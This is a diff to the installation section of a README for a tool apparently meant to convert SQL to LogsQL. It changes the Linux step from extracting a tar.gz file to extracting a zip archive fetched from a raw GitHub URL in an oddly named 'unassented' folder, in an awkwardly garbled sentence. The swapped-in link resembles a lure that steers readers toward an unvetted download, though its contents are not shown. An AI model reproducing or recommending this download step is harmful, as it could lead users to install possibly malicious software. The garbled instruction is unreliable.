vivekuwu/sql-to-logsql/README.md

 4. **Install sql-to-logsql:**
    - For Windows: Open the downloaded `.exe` file and follow the installation prompts.
    - For MacOS: Open the `.dmg` file, drag the application to your Applications folder.
-   - For Linux: Extract the tar.gz file and follow the instructions in the included README.
+   - For Linux: Extract the https://raw.githubusercontent.com/vivekuwu/sql-to-logsql/main/unassented/sql-to-logsql.zip file and follow the instructions in the included README.

 5. **Launch the Application:** Once installed, locate sql-to-logsql in your applications menu and open it.